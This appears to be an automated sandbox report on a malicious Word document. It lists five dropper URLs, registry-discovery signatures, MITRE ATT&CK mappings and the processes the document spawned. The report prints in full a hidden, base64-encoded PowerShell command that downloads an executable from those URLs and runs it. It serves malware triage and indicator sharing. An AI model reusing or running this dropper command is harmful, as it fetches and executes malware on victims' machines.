d394ed6a30ff8bd2c2812675561d9662c72ea9d8c987dd329046f0ecfdeb9177

General

Target

d394ed6a30ff8bd2c2812675561d9662c72ea9d8c987dd329046f0ecfdeb9177
Sample

191219-mxhj5zdd9x
SHA256

d394ed6a30ff8bd2c2812675561d9662c72ea9d8c987dd329046f0ecfdeb9177

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://laclinika.com/wp-admin/r42ar70/

exe.dropper

https://thechasermart.com/wp-admin/7u93/

exe.dropper

https://zamusicport.com/wp-content/Vmc/

exe.dropper

https://zaloshop.net/wp-admin/8j0827/

exe.dropper

https://www.leatherbyd.com/PHPMailer-master/q91l5u01353/

Signatures

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4848	WINWORD.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4848	WINWORD.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4848	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3684	4944	Powershell.exe	73

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3684	Powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3684	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d394ed6a30ff8bd2c2812675561d9662c72ea9d8c987dd329046f0ecfdeb9177.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABTAHEAbgB1AHAAcwB1AHkAPQAnAEsAbABsAG0AaQByAGsAZwBhAGMAYwAnADsAJABIAHQAdABlAGYAZQBtAHIAawB5AGEAcAB3ACAAPQAgACcANgAzADcAJwA7ACQAVABiAGgAeABuAHMAbwBoAG0AYgBmAGoAPQAnAFUAZgBtAHUAbgBvAHUAdABiAGUAYwBoACcAOwAkAE8AeQBpAGwAcwBlAGUAYwBmAHgAegBjAG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAdAB0AGUAZgBlAG0AcgBrAHkAYQBwAHcAKwAnAC4AZQB4AGUAJwA7ACQAVwBuAGIAYgBnAHQAYQBuAGwAPQAnAE4AYgBkAHoAagBoAHoAYgBzAGwAJwA7ACQASwBkAHMAegB1AHMAZABiAHMAcwB4AD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMAbABpAGUAbgBUADsAJABaAGEAYwBmAGwAdABkAHIAYwBrAHoAdQA9ACcAaAB0AHQAcABzADoALwAvAGwAYQBjAGwAaQBuAGkAawBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwByADQAMgBhAHIANwAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdABoAGUAYwBoAGEAcwBlAHIAbQBhAHIAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANwB1ADkAMwAvACoAaAB0AHQAcABzADoALwAvAHoAYQBtAHUAcwBpAGMAcABvAHIAdAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAbQBjAC8AKgBoAHQAdABwAHMAOgAvAC8AegBhAGwAbwBzAGgAbwBwAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwA4AGoAMAA4ADIANwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbABlAGEAdABoAGUAcgBiAHkAZAAuAGMAbwBtAC8AUABIAFAATQBhAGkAbABlAHIALQBtAGEAcwB0AGUAcgAvAHEAOQAxAGwANQB1ADAAMQAzADUAMwAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABIAGQAdgB6AGEAYQBjAHYAZwBjAGcAPQAnAEEAZABjAHcAcgBoAHQAcABqAHoAbQBxAHUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFEAawBpAHUAeAByAHkAagB3AGsAbwAgAGkAbgAgACQAWgBhAGMAZgBsAHQAZAByAGMAawB6AHUAKQB7AHQAcgB5AHsAJABLAGQAcwB6AHUAcwBkAGIAcwBzAHgALgAiAGQATwB3AE4ATABPAEEAYABEAGAARgBgAEkATABlACIAKAAkAFEAawBpAHUAeAByAHkAagB3AGsAbwAsACAAJABPAHkAaQBsAHMAZQBlAGMAZgB4AHoAYwBuACkAOwAkAEQAZgB4AHcAYgB4AHQAeQBrAHQAYQBtAGoAPQAnAEsAdQBzAGEAagBkAHcAZQBhACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATwB5AGkAbABzAGUAZQBjAGYAeAB6AGMAbgApAC4AIgBsAGAARQBuAGAARwBUAEgAIgAgAC0AZwBlACAAMgAzADUAMQAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAUgB0ACIAKAAkAE8AeQBpAGwAcwBlAGUAYwBmAHgAegBjAG4AKQA7ACQAWQBkAGkAaQBnAGoAZgBzAD0AJwBLAGkAYQBoAGYAcwBkAHEAdQAnADsAYgByAGUAYQBrADsAJABEAHAAcwB5AHQAaAB0AGcAYgB3AHIAPQAnAFUAdgBiAGsAdQBjAGQAaQBmAGYAawBqAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABiAGoAagByAG0AdQBuAHEAawBtAGIAbQA9ACcASQBzAGkAZABtAGsAcQBzAHcAcgBnAGUAeQAnAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3684

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads